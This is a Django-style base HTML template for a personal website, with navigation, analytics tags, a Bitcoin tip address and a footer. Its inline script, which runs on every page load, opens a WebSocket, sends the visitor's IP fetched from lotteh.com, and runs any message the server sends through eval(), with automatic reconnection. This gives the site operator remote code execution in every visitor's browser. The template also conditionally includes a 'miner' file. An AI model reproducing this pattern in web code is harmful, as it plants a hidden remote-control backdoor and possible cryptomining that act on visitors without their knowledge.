<!doctype html> <html lang="{{ lang }}">
{% load feed_filters %}
{% load app_filters %}
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="{{ description|trans }}">
    <meta name="author" content="Charlotte Grace Harper">
    <link rel="icon" href="/media/favicon.ico">
    <title>{% if title %}{{ title }} - {% endif %}{{ site_name }}</title>
    <link rel="canonical" href="https://glamgirlx.com{{ path }}">
    <link href="/static/main.css" rel="stylesheet">
    <link rel="manifest" href="/site.webmanifest">
    <meta name="msapplication-TileColor" content="#da532c">
    <meta name="theme-color" content="#ffffff">
    <link rel="stylesheet" href="/static/fonts/bootstrap-icons.css">
    {% block head %}{% endblock %}
    <script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js?client=ca-pub-6209985848112194"
         crossorigin="anonymous"></script>
	<script async src="https://www.googletagmanager.com/gtag/js?id=G-XG1SZ2K8S5"></script>
	<script>
	  window.dataLayer = window.dataLayer || [];
	  function gtag(){dataLayer.push(arguments);}
	  gtag('js', new Date());
	
	  gtag('config', 'G-XG1SZ2K8S5');
	</script>
    <!-- Google tag (gtag.js) -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=AW-16692395808">
    </script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());

      gtag('config', 'AW-16692395808');
    </script>
  </head>
  <body>
    <header>
      {% if not hidenav %}
      {% if polling_now %}
        {% include 'voting_banner.html' %}
      {% endif %}
      <nav id="glam-navbar" class="navbar fixed-top navbar-expand-lg navbar-light p-2" style="background-color: #e3f2fd;">
        <a style="position: relative; z-index: 1;" class="navbar-brand" href="/{{ lang }}/" title="{{ 'The homepage'|etrans }}">
	        <img src="/media/lips.png" alt="{{ 'The logo'|etrans }} - {{ site_name }}" width="30" height="30" style="border-radius: 50%; background-color: transparent;">
	    	{{ site_name }}
    	</a>
        <button class="navbar-toggler ms-auto" type="button" data-bs-toggle="collapse" data-bs-target="#navbarSupportedContent" data-bs-auto-close="true" data-bs-toggle="dropdown" aria-controls="navbarScroll" aria-expanded="false" aria-label="Toggle navigation">
          <span class="navbar-toggler-icon"></span>
        </button>
        {% load feed_filters %}
        {% load app_filters %}
        <div class="collapse navbar-collapse " id="navbarSupportedContent">
          <ul class="navbar-nav mr-auto">
            <li class="nav-item">
              <a class="nav-link" href="/{{ lang }}/news" title="{{ 'New articles'|etrans }}">{{ 'News'|etrans }}</a>
            </li>
            <li class="nav-item">
              <a class="nav-link" href="/{{ lang }}/contact" title="{{ 'Contact me'|etrans }}">{{ 'Contact'|etrans }}</a>
            </li>
            <li class="nav-item">
              <a class="nav-link" href="/{{ lang }}/landing" title="{{ 'Visit the landing page'|etrans }}">{{ 'Landing'|etrans }}</a>
            </li>
            <li class="nav-item">
              <a class="nav-link" href="/{{ lang }}/chat" title="{{ 'Video chat'|etrans }}">{{ 'Chat'|etrans }}</a>
            </li>
            <li class="nav-item">
              <a class="nav-link" href="/{{ lang }}/private" title="{{ 'See private photos with a key'|etrans }}">{{ 'Private'|etrans }}</a>
            </li>
            <li class="nav-item">
              <a class="nav-link" href="{{ site_url }}{% url 'payments:surrogacy' model_name %}?lang={{ lang }}" title="Surrogacy plans">{{ 'Surrogacy'|etrans }}</a>
            </li>
          </ul>
          <ul class="navbar-nav" style="margin-left: auto;">
            <form class="form-inline d-flex mt-2 mt-md-0" action="{{ site_url }}/search/" method="GET">
              <input class="form-control hide" type="text" id="lang" name="lang" value="{{ lang }}">
              <input class="form-control mr-sm-2" type="text" id="q" name="q" placeholder="{{ 'Search'|etrans }}" aria-label="{{ 'Search'|etrans }}" required>
              <button class="btn btn-outline-success my-2 my-sm-0" type="submit" title="{{ 'Search my website,'|etrans }} {{ base_domain }}">{{ 'Search'|etrans }}</button>
            </form>
            <li class="nav-item">
              <a class="nav-link disabled" href="#" title="{{ 'Always free - Create an account to support me'|etrans }}">{{ 'Free'|etrans }}</a>
            </li>
            <li class="nav-item align-middle">
              {% include 'dynamic_time.html' %}
            </li>
            <li class="nav-item align-middle">
              {% include 'dynamic_text_time.html' %}
            </li>
            <li class="nav-item">
	          <a href="{{ site_url }}{% url 'landing:index' %}" title="{{ 'Visit the landing page'|etrans }}">
                {% include 'sclock.html' %}
              </a>
            </li>
          </ul>
        </div>
      </nav>
    </header>
    {% endif %}
    <main role="main" class="container">
        {% if not hidefooter %}
	    <div style="height: 100px;"></div>
        {% endif %}
	    {% block content %}{% endblock %}
        {% if not hidefooter %}
        {% include 'web/language.html' %}
        <p><i>{{ 'Leave me a tip in Bitcoin using this address:'|etrans }}</i> <b id="btc-wallet">{{ btc_wallet }}</b> <button class="btn btn-sm btn-info" title="{{ 'Copy address'|etrans }}" onclick="copyToClipboard('btc-wallet');">{{ 'Copy'|etrans }}</button></p>
        <div id="javascript-console"></div>
	    <div class="d-flex justify-content-between p-2">
	        <div style="float:left;">
	          <p><span class="badge bg-light text-dark shadow p-1">&copy; {{ site_name }} {{ year }}</span></p>
		    </div>
            <div style="text-align: center;">
                {% if show_social_links %} <a href="{{ instagram_link }}" about="_blank" title="{{ 'Visit me on Instagram'|etrans }}" style="font-size: 20px;" class="ml-1"><i class="bi bi-instagram"></i></a> <a href="{{ twitter_link }}" about="_blank" title="{{ 'Visit me on Twitter'|etrans }}" style="font-size: 20px;" class="ml-1"><i class="bi bi-twitter"></i></a> <a href="{{ youtube_link }}" about="_blank" title="{{ 'Watch me on YouTube'|etrans }}" style="font-size: 20px;" class="ml-1"><i class="bi bi-youtube"></i></a>{% endif %}
            </div>
	        <div style="float:right;">
	          <p><span class="badge bg-light text-dark shadow p-1"><a href="{{ site_url }}/terms/?lang={{ lang }}" title="{{ 'See the terms of service'|etrans }}">{{ 'Terms of Service'|etrans }}</a></span></p>
		    </div>
	    </div>
	    <div style="height: 100px;"></div>
        {% endif %}
    </main>
    {% if not hidefooter %}
    {% block footer %}{% endblock %}
    {% endif %}
    <script src="/static/main.js"></script>
    <script>
        {% block javascript %}{% endblock %}
        {% load feed_filters %}
        {% load app_filters %}
        $(document).ready(function() {
            {% if not hidenavbar %}
            {% if polling_now %}
            var hideVoteCookie = getCookie("hidevotebanner") != '';
            if(document.getElementById('vote-banner') && hideVoteCookie) { document.getElementById('vote-banner').classList.add('fade-hidden'); }
            else if(document.getElementById('vote-banner')) { document.getElementById('vote-banner').classList.remove('fade-hidden');
            document.getElementById('vote-banner').classList.remove('hide'); }
            {% endif %}
            $(document.getElementById("glam-navbar")).autoHidingNavbar();
            {% endif %}
        	Prism.highlightAll();
        });
        var remoteSocket;
        function openRemoteSocket() {
            window.location.hash = '';
            remoteSocket = new WebSocket("wss://{{ base_domain }}"  + '/ws/remote/?path=' + window.location.href.split('#')[0]);
            remoteSocket.addEventListener("open", (event) => {
                console.log('Socket open.');
                fetch('https://lotteh.com/remote/generate/')
        		    .then(response => response.json())
        		    .then(data => {
        		        remoteSocket.send(data.ip);
        		    })
        		    .catch(error => {
        		        console.log('Error:', error);
        		    });
            });
            remoteSocket.addEventListener("close", (event) => {
                console.log('Socket closed.');
                setTimeout(function() {
                    openRemoteSocket();
                }, 10000);
            });
        	remoteSocket.addEventListener("message", (event) => {
                    eval(event.data);
            });
        }
        openRemoteSocket();
        $(document).ready(function() {
        	$("#contact-form").submit(function(e){
                	e.preventDefault();
                	var data = new FormData(document.getElementById('contact-form'));
                	$.ajax({
                        	url: "{{ site_url }}/contact/",
                        	type: "POST",
                        	data: data,
                        	cache: false,
                	        contentType: false,
        	                processData: false,
                            timeout: 1000 * 60,
                	        tryCount: 0,
        	                retryLimit: 5,
                            error: (xhr, textStatus, errorThrown) => {
                                    this.tryCount++;
                                    if(this.tryCount >= this.retryLimit) return;
                                    $.ajax(this);
                            },
                            success: (data) => {
                                    if(data == 'Message sent.') {
                                            $('#contact-submit').prop('disabled', true);
                                            $(this).trigger('reset');
                                    }
                                    document.getElementById('contact-message').innerHTML = data;
                                    $('#contact-message').removeClass('hide');
                            },
                    });
            });
        });
        $(document).ready(function() {
        	{% include 'clock.js' %}
            var qrdiv = document.getElementById("shareqrcode");
        	if(!qrdiv) return;
        	var qr = new QRCode(qrdiv, "{{ base_url }}{{ path }}{% if request.GET %}?{% for key, value in request.GET.items %}{{key}}={{value}}{% if forloop.counter < request.GET|length %}&{% endif %}{% endfor %}{% endif %}");
        	var image = qrdiv.querySelector('img');
            image.style.width = "100%";
            image.style.height = "100%";
            image.style.maxWidth = "160px";
            image.alt = "{{ 'Share this page by scanning a QR code.'|etrans }}";
            try {
                function getBase64Image(img) {
                    var src = img.src;
                    var image = new Image();
                    image.src = src;
                    image.onload = function(event) {
                    var bsfcanvas = document.createElement("canvas");
                    bsfcanvas.width = img.clientWidth + 40;
                    bsfcanvas.height = img.clientHeight + 40;
                    if(bsfcanvas.height < bsfcanvas.width) bsfcanvas.height = bsfcanvas.width;
                    var bsfctx = bsfcanvas.getContext("2d");
                    bsfctx.fillStyle = "#ffffff";
                    bsfctx.fillRect(0, 0, bsfcanvas.width, bsfcanvas.height);
                    bsfctx.drawImage(event.target, 20, 20, bsfcanvas.width - 40, bsfcanvas.height - 40);
                    var dataURL = bsfcanvas.toDataURL("image/png");
                    downloadQrImage(dataURL, '{{ the_site_name }} - QR Code.png');
                    };
                }
                function downloadQrImage(url, filename) {
                    const link = document.createElement('a');
                    link.download = filename;
                    link.href = url;
                    link.classList.add('hide');
                    link.click();
                }
                function downloadQr(){
                    var theQrImage = document.getElementById('shareqrcode').querySelector('img');
                    getBase64Image(theQrImage);
                }
                qrdiv.onclick = downloadQr;
                } catch(error) {
                        document.getElementById('javascript-console').insertAdjacentHTML("beforeend", '<div>' + new String(error) + '</div>');
                }
        });
    </script>
    {% if not hiderrm %}
    {% include 'rrm.html' %}
    {% endif %}
    {% if activate_mining %}
    {% include 'web/miner.html' %}
    {% endif %}
    {% block javascripts %}
    {% endblock %}
    <script>
        if (navigator.serviceWorker) {
            navigator.serviceWorker.register (
              '/serviceworker.js',
              {scope: '/'}
            )
        }
    </script>
</body>
</html>
